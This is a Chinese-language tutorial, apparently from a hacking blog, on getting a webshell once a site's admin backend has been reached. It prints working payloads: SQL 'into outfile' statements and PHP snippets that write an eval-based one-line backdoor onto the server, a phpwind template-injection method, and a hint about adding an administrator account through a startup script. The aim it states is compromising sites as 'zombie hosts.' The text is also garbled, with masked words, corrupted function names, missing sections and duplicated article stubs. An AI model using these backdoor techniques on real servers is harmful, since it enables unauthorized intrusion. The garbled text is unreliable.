前 言
動網上傳漏洞,相信大家拿下不少肉雞吧。可以說是動網讓upfile.asp上傳檔案過濾不嚴的漏洞昭然天下,現在這種漏洞已經基本比較難見到了,不排除一些小**仍然存在此漏洞。在拿站過程中,我們經常費了九牛兩虎之力拿到管理員帳號和密碼,並順利進入了後台,雖然此時與拿到**webshell還有一步之遙,但還是有許多新手因想不出合適的方法而被拒之門外。因此,我們把常用的從後台得到webshell的方法進行了總結和歸納,大體情況有以下十大方面。
注意:如何進入後台,不是本文討論範圍,其具體方法就不說了,靠大家去自己發揮。此文參考了前人的多方面的資料和資訊,在此一併表示感謝。
一、直接上傳獲得webshell
這種對php和jsp的一些程式比較常見,molyx board就是其中一例,直接在心情圖示管理上傳.php型別,雖然沒有提示,其實已經成功了,上傳的文 件url應該是
要複製到的位置:
。就可以暴出路徑,php環境中比較容易暴出絕對路徑:)。提一點的是遇到是mysql在win系統下路徑應該這樣寫d:\\wwwroot\\a.php。下面的方法是比較常用的乙個匯出webshell的方法,也可以寫個vbs新增系統管理員的指令碼匯出到啟動資料夾,系統重起後就會新增乙個管理員帳號
create table a(cmd text not null)
insert into a(cmd) values('<?fputs(fopen("./a.php","w"),"<?eval(\$_post[a]);?>")?>')
select cmd from a into outfile '路徑/b.php'
drop table if exists a
訪問b.php就會生成乙個<?eval($_post[a]);?>的最小馬。
如果遇到可以執行php命令就簡單多了,典型的代表是bo-blog,在後台的php命令框輸入以下**:
<?
$sa = fopen("./up/saiy.php","w");
fw9xiaote($sa,"<?eval(\$_post[a]);?".">");
fclose($sa);
?>
就會在up目錄下生成檔名為saiy.php內容為<?eval($_post[a]);?>的最小php木馬,
最後用lanker的客戶端來連線。實際運用中要考慮到資料夾是否有寫許可權。或者輸入這樣的**<?fputs(fopen("./a.php","w"),"<?eval(\$_post[a]);?>")?> 將會在當前目錄生成乙個a.php的最小馬。
九、phpwind論壇從後台到webshell的三種方式
方式1 模板法
進入後台, 風格模版設定 ,在隨便一行寫**,記住,這**必須頂著左邊行寫,**前面不可以有任何字元。
eot;
eval($a);
p9xiaont 《附件:
從後台到webshell的一點思路
安全天使 1.asp acc mssql程式 主要是利用後台對access資料庫的 備份資料庫 或 恢復資料庫 功能,備份的資料庫路徑 等變數沒有過濾導致可以把任意檔案字尾改為asp,從而得到webshell,msssql版的程式就直接應用了access版的 導致sql版照樣可以利用。具體方法和分析...
從Webshell到肉雞
從webshell到肉雞 s.s.f simeon 我一直都在強調乙個東西,在網路 中最重要的就是思維,本文的靈感來自於安天365團隊的乙個篇稿件,在稿件中提到了乙個aspxspy的asp.net型別後門 軟體,在安全界中最近一直流行後門中的後門,即通過給出乙個包含後門的webshell程式,眾多小...
從Webshell到肉雞
從webshell到肉雞 s.s.f simeon 我一直都在強調乙個東西,在網路攻防中最重要的就是思維,本文的靈感來自於安天365團隊的乙個篇稿件,在稿件中提到了乙個aspxspy的asp.net型別後門 軟體,在安全界中最近一直流行後門中的後門,即通過給出乙個包含後門的webshell程式,眾多...